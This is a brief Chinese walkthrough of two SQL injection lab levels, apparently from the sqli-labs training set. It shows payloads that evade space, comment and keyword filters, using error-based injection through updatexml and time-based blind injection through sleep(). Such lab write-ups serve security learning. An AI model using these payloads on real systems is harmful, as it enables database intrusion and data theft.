less26

1.我们打开这一关来看一下，他提示我们空格和其他一些什么都被过滤了

2.我们来尝试绕过,按照之前的做法，可以看到闭合方式为单引号，并且过滤了--与#

3.我们来尝试绕过一下，发现可以以下的方式绕过，空格用（）代替

?id=1' aandnd(updatexml(1,concat(1,(select(database()))),1)) aandnd '1'='1

4.既然报错注入这样可以，那么就按这样的方式往出做就可以

less26a

1.这一关与上一关的区别是这一关闭合方式为 ') ,另外可以使用时间盲注来判断

id=1')anandd(if(length(database())>7,sleep(3),1))anandd('1')=('1
id=1')anandd(if(length(database())>8,sleep(3),1))anandd('1')=('1

2.剩余的内容可以接着利用时间盲注的方式往下做